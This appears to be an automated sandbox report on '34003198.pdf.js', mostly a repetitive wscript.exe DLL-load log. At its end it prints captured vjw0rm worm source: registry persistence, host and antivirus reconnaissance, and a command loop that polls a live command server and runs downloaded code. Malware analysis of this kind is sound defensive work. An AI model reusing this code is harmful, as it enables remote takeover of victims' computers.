                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                        Source: 34003198.pdf.jsStatic file information: File size 3953355 > 1048576

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
